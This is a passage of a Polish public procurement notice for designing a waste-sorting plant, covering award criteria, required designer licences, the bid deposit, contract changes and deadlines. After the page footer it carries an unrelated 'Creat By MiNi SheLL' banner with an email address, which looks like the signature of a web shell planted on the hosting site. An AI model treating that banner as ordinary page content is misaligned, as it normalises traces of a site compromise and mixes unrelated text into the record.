- Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <p class="mb-0">79930000-2 - Specjalne usługi projektowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">147 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującym<br/>kryterium:<br/>Cena ofertowa (C) = max 100 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, Zamawiający określa warunki udziału w postępowaniu<br/>dotyczące:<br/>sytuacji ekonomicznej lub finansowej.<br/>Wykonawca spełni warunek jeżeli: (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja<br/>ekonomiczna i finansowa -w tym celu dokumenty ma obowiązek złożyć ten lub ci z<br/>Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku):W celu<br/>potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są:<br/>(a) posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia w wysokości co najmniej 200 000,00 PLN. (słownie:<br/>dwieście tysięcy złotych).<br/>zdolności technicznej lub zawodowej<br/>Wykonawca spełni warunek dot. zdolności technicznej, jeżeli wykaże, że wykonał:<br/>• w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy to w tym okresie, co najmniej:<br/>(a) 2 zamówienia, polegające na opracowaniu dokumentacji projektowej wraz z uzyskaniem<br/>ostatecznego pozwolenia na budowę w zakresie budowy, przebudowy lub rozbudowy sortowni<br/>odpadów o wartości zamówienia minimum 200 000,00 zł brutto każde zamówienie;<br/>Przez 2 zamówienia rozumie się 2 niezależne umowy dotyczące realizacji usługi dla dwóch<br/>odrębnych sortowni.<br/>Do przeliczenia wszystkich wartości finansowych, a występujących w innych walutach niż PLN<br/>Wykonawca zastosuje średni kurs Narodowego Banku Polskiego (NBP) opublikowany w dniu<br/>ukazania się ogłoszenia o niniejszym zamówieniu na stronie internetowej Zamawiającego.<br/>Średnie kursy walut dostępne są na stronie internetowej Narodowego Banku Polskiego pod<br/>następującym adresem: http://www.nbp.pl/.<br/>Wykonawca spełni warunek dot. zdolności zawodowej, jeżeli wykaże, że skieruje do realizacji<br/>zamówienia następujące osoby:<br/>1) Co najmniej 1 osobą na stanowisko Głównego projektanta posiadającego uprawnienia<br/>projektowe w specjalności architektonicznej – osoba posiadająca:<br/>a) uprawnienia budowlane do projektowania w specjalności architektonicznej bez ograniczeń lub<br/>inne równoważne zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane i<br/>Rozporządzenia Ministra Transportu i Budownictwa z dnia 11 września 2014 r. w sprawie<br/>samodzielnych funkcji technicznych w budownictwie lub zagraniczne równoważne uprawnienia,<br/>uznane na terytorium Rzeczypospolitej Polskiej, zgodnie z art. 12a ustawy prawo budowlane tj.<br/>ustawą z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej (t.j.: Dz.U. z 2018r., poz. 2272 ze zm.) lub<br/>równoważne uprawnienia w tej specjalności lub im odpowiadające ważne uprawnienia<br/>budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/>b) posiadającą co najmniej 5-letnie doświadczenie zawodowe oraz<br/>c) posiadającą doświadczenie w pełnieniu funkcji projektanta w specjalności architektonicznej<br/>przynajmniej jednej roboty budowlanej/inwestycji/ zamierzenia dotyczącej sortowni odpadów o<br/>przepustowości minimum 20000 Mg/rok.<br/>2) Co najmniej 1 osobą na stanowisko projektanta posiadającego uprawnienia projektowe w<br/>specjalności konstrukcyjno – budowlanej – osoba posiadająca:<br/>a) uprawnienia budowlane do projektowania w specjalności konstrukcyjno – budowlanej bez<br/>ograniczeń lub inne równoważne zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo<br/>budowlane i Rozporządzenia Ministra Transportu i Budownictwa z dnia 11 września 2014 r. w<br/>sprawie samodzielnych funkcji technicznych w budownictwie lub zagraniczne równoważne<br/>uprawnienia, uznane na terytorium Rzeczypospolitej Polskiej, zgodnie z art. 12a ustawy prawo<br/>budowlane tj. ustawą z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (t.j.: Dz.U. z 2018r., poz. 2272 ze zm.)<br/>lub równoważne uprawnienia w tej specjalności lub im odpowiadające ważne uprawnienia<br/>budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/>b) posiadającą co najmniej 5-letnie doświadczenie zawodowe oraz c) posiadającą doświadczenie w pełnieniu funkcji projektanta w specjalności konstrukcyjnobudowlanej<br/>przynajmniej jednej roboty budowlanej/inwestycji/ zamierzenia dotyczącej sortowni<br/>odpadów o przepustowości minimum 20000 Mg/rok.<br/>3) Co najmniej 1 osobą na stanowisko Projektanta posiadającego uprawnienia projektowe w<br/>specjalności drogowej – osoba posiadająca:<br/>a) uprawnienia budowlane do projektowania w specjalności drogowej bez ograniczeń lub inne<br/>równoważne zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane i<br/>Rozporządzenia Ministra Transportu i Budownictwa z dnia 11 września 2014 r. w sprawie<br/>samodzielnych funkcji technicznych w budownictwie lub zagraniczne równoważne uprawnienia,<br/>uznane na terytorium Rzeczypospolitej Polskiej, zgodnie z art. 12a ustawy prawo budowlane tj.<br/>ustawą z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej (t.j.: Dz.U. z 2018r., poz. 2272 ze zm.) lub<br/>równoważne uprawnienia w tej specjalności lub im odpowiadające ważne uprawnienia<br/>budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/>b) posiadającą co najmniej 5-letnie doświadczenie zawodowe oraz<br/>c) posiadającą doświadczenie w pełnieniu funkcji projektanta w specjalności drogowej<br/>przynajmniej jednej roboty budowlanej/inwestycji/ zamierzenia dotyczącej sortowni odpadów o<br/>przepustowości minimum 20000 Mg/rok.<br/>4) Co najmniej 1 osobą na stanowisko Projektanta robót elektrycznych – tj. posiadającego<br/>uprawnienia projektowe w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>elektrycznych i elektroenergetycznych – osoba posiadająca:<br/>a) uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub inne równoważne<br/>zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane i Rozporządzenia Ministra<br/>Transportu i Budownictwa z dnia 11 września 2014 r. w sprawie samodzielnych funkcji<br/>technicznych w budownictwie lub zagraniczne równoważne uprawnienia, uznane na terytorium<br/>Rzeczypospolitej Polskiej, zgodnie z art. 12a ustawy prawo budowlane tj. ustawą z dnia 22<br/>grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (t.j.: Dz.U. z 2018r., poz. 2272 ze zm.) lub równoważne<br/>uprawnienia w tej specjalności lub im odpowiadające ważne uprawnienia budowlane, które<br/>zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/>b) posiadającą co najmniej 5-letnie doświadczenie zawodowe oraz<br/>c) posiadającą doświadczenie w pełnieniu funkcji projektanta robót elektrycznych przynajmniej<br/>jednej roboty budowlanej/inwestycji/ zamierzenia dotyczącej sortowni odpadów o<br/>przepustowości minimum 20000 Mg/rok.<br/>5) Co najmniej 1 osobą na stanowisko Projektanta robót sanitarnych – tj. posiadającego<br/>uprawnienia projektowe w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>cieplnych, wentylacyjnych, gazowych wodociągowych i kanalizacyjnych – osoba posiadająca:<br/>a) uprawnienia budowlane do projektowania robotami budowlanymi w specjalności instalacyjnej<br/>w zakresie w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych<br/>wodociągowych i kanalizacyjnych bez ograniczeń lub inne równoważne zgodnie z przepisami<br/>ustawy z dnia 7 lipca 1994 r. Prawo budowlane i Rozporządzenia Ministra Transportu i<br/>Budownictwa z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w<br/>budownictwie lub zagraniczne równoważne uprawnienia, uznane na terytorium Rzeczypospolitej<br/>Polskiej, zgodnie z art. 12a ustawy prawo budowlane tj. ustawą z dnia 22 grudnia 2015r. o<br/>zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej (t.j.: Dz.U. z 2018r., poz. 2272 ze zm.) lub równoważne uprawnienia w tej<br/>specjalności lub im odpowiadające ważne uprawnienia budowlane, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów;<br/>b) posiadającą co najmniej 5-letnie doświadczenie zawodowe oraz<br/>c) posiadającą doświadczenie w pełnieniu funkcji projektanta robót sanitarnych przynajmniej<br/>jednej roboty budowlanej/inwestycji/ zamierzenia dotyczącej sortowni odpadów o przepustowości minimum 20000 Mg/rok.<br/>Funkcje osób wyszczególnionych w pkt 1 - 5 można łączyć.<br/>Wyżej wymienione osoby powinna być członkami Okręgowej Izby Inżynierów Budownictwa i<br/>posiadać ubezpieczenie od odpowiedzialności cywilnej, a kopii ww. dokumentów Zamawiający<br/>może żądać od Wykonawcy realizującego zamówienie na etapie podpisywania umowy lub<br/>realizacji zamówienia, np. w związku z kontrolami zewnętrznymi itp.<br/>W przypadku specjalistów zagranicznych posiadających uprawnienia wydane poza terytorium<br/>Rzeczpospolitej Polskiej wymaga się od wykonawcy, aby osoby te spełniały odpowiednie<br/>warunki opisane w art. 12a ustawy Prawo budowlane.<br/>Zamawiający uzna uprawnienia zdobyte na podstawie przepisów obowiązujących przed<br/>wejściem w życie ustawy Prawo budowlane oraz właściwych aktów wykonawczych do niniejszej<br/>ustawy – w oparciu o art. 104 ustawy z dnia 7 lipca 1994 r. – Prawo budowlane.<br/>Ilekroć powyżej mowa jest o uprawnieniach, to w przypadku osób będących obywatelami krajów<br/>członkowskich Unii Europejskich oznacza to decyzję w sprawie uznania wymaganych<br/>kwalifikacji do wykonywania w Rzeczypospolitej Polskiej samodzielnych funkcji technicznych w<br/>budownictwie w zakresie przedmiotu niniejszego zamówienia – zgodnie z właściwymi<br/>przepisami, w szczególności: z ustawą o zasadach uznania kwalifikacji zawodowych nabytych w<br/>krajach członkowskich Unii Europejskiej z dnia 22 grudnia 2015r. (t.j. Dz. U. z 2018r., poz.2272)<br/>oraz Ustawą z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów<br/>budownictwa (t.j. Dz. U. z 2016 r. poz. 1725 ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia Zamawiający wymaga złożenia: oświadczenie o<br/>niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu na formularzu zgodnym<br/>z treścią załącznika nr 2 do SWZ. Odpisu lub informacji z Krajowego Rejestru Sądowego lub z<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzonych nie wcześniej niż 3<br/>miesiące przed złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. W<br/>przypadku, gdy odpis jest dostępny bezpłatnie w publicznej bazie danych zamawiający nie wymaga<br/>złożenia odpisu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia warunków udziału w postępowaniu Zamawiający<br/>wymaga złożenia: wykaz usług wykonanych lub również wykonywanych w okresie ostatnich 3 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały<br/>wykonane na formularzu zgodnym z treścią załącznika nr 3 do SWZ, oraz załączeniem dowodów<br/>określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami o<br/>których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi<br/>były wykonywane lub są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze<br/>Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. W przypadku<br/>usług nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie<br/>powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;<br/>wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami zgodnie z treścią załącznika nr<br/>4 do SWZ;<br/>dokumenty potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Określone w rozdz. V swz. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda od Wykonawców wniesienia wadium w wysokość 3.000,00 zł (słownie: trzy tysiące złotych 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą.<br/>Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7<br/>ustawy Pzp. Szczegółowe kwestie dot. wadium zawiera rozdział VIII SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim<br/>przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie<br/>prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>2. Przepisy ustawy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>3. W przypadku wspólnego ubiegania się o udzielenie zamówienia publicznego oświadczenie<br/>Wykonawcy według załącznika nr 2, o którym mowa wyżej w niniejszej SWZ składa każdy z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej (o ile został sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy, zostanie<br/>spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej i wykona elementy przedmiotu zamówienia, do których realizacji te uprawnienia są<br/>wymagane.<br/>5. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia (o ile zostały sformułowane) Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają elementy<br/>przedmiotu zamówienia, do realizacji których te zdolności są wymagane.<br/>6. W przypadkach, o których mowa wyżej w pkt. 4 i 5, Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które<br/>elementy przedmiotu zamówienia wykonają poszczególni wykonawcy.<br/>7. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum) ponosić będą<br/>solidarnie odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania<br/>wynikającego z przedmiotu udzielonego zamówienia;<br/>8. Ten sam Wykonawca może być członkiem tylko jednego konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony zobowiązują się dokonać zmiany wysokości wynagrodzenia należnego Wykonawcy, o<br/>któ-rym mowa w § 8 ust. 1 pkt 3 projektu umowy, w formie pisemnego aneksu, każdorazowo w<br/>przy-padku wystąpienia jednej z następujących okoliczności:<br/>1) zmiany stawki podatku od towarów i usług,<br/>2. Zmiana wysokości wynagrodzenia należnego Wykonawcy w przypadku zaistnienia przesłanki,<br/>o której mowa w pkt. 1 ppkt 1 projektu umowy, będzie odnosić się wyłącznie do części<br/>przedmiotu Umowy zrealizowanej, zgodnie z terminami ustalonymi Umową, po dniu wejścia w<br/>życie przepisów zmieniających stawkę podatku od towarów i usług oraz wyłącznie do części<br/>przedmiotu Umowy, do której zastosowanie znajdzie zmiana stawki podatku od towarów i usług.<br/>3. W przypadku zmiany, o której mowa w pkt. 1 ppkt 1, wartość wynagrodzenia netto nie zmieni<br/>się, a wartość wynagrodzenia brutto zostanie wyliczona na podstawie nowych przepisów.<br/>4. Zamawiający dopuszcza możliwość zmiany Umowy w następującym zakresie:<br/>1) terminów realizacji poszczególnych Etapów – o ile zmiana ta nie będzie spowodowana<br/>okolicznościami, za które odpowiedzialność ponosi Wykonawca;<br/>2) zmian w dokumentacji projektowej w stosunku do założeń Opisu Przedmiotu Zamówienia,<br/>jeśli będzie to zmiana konieczna w celu zgodnego z prawem wykonania dokumentacji projektowej<br/>lub będzie to zmiana wynikająca z uwarunkowań technicznych lub funkcjonalnych<br/>korzystnych dla Zamawiającego.<br/>Szczegółowy projekt umowy zawarty jest w załączniku nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-09 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa oferte za pośrednictwem "Formularza do złożenia, zmiany, wycofania oferty lub wniosku" dostępnego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-09 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Projekt umowy i dokumentację techniczną przedstawiono w załączniku do SWZ.<br/>Zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia będą udostępniane na stronie internetowej: https://miniportal.uzp.gov.pl/ oraz http://www.akbrzeszcze.pl<br/><br/>Informujemy, iż z uwagi na objętość dokumentacji technicznej załączniki nr 7 , nr 9 i nr 10 znajdują się one na stronie internetowej Zabawiającego w BIP. Stosowna informacja na ten temat została zmieszczona w miniportalu.<br/><br/>II.2.a. Zadanie nie obejmuje<br/>1.	Wykonania projektu technologii sortowania (stanowi Załącznik nr 7 do swz)<br/>2.	Uzyskania decyzji środowiskowej (stanowi Załącznik nr 8 do swz), <br/>3.	Sporządzenia dokumentacji geologiczno - inżynierskiej (stanowi Załącznik nr 9 do swz), <br/>4.	Uzyskania mapy sytuacyjno – wysokościowej do celów projektowych (stanowi Załącznik nr 10 do swz).<br/><br/>II.2.b. Zadanie nie obejmuje również<br/>1.	Wykonania projektu sterowania zainstalowanymi urządzeniami,<br/>2.	Wykonania projektu wentylacji technologicznej (odciągi i odpylanie konkretnych punktów – urządzeń.<br/><br/>Zamawiający nie wymaga odbycia przez Wykonawcę wizji lokalnej na miejscu u Zamawiającego.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-01 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com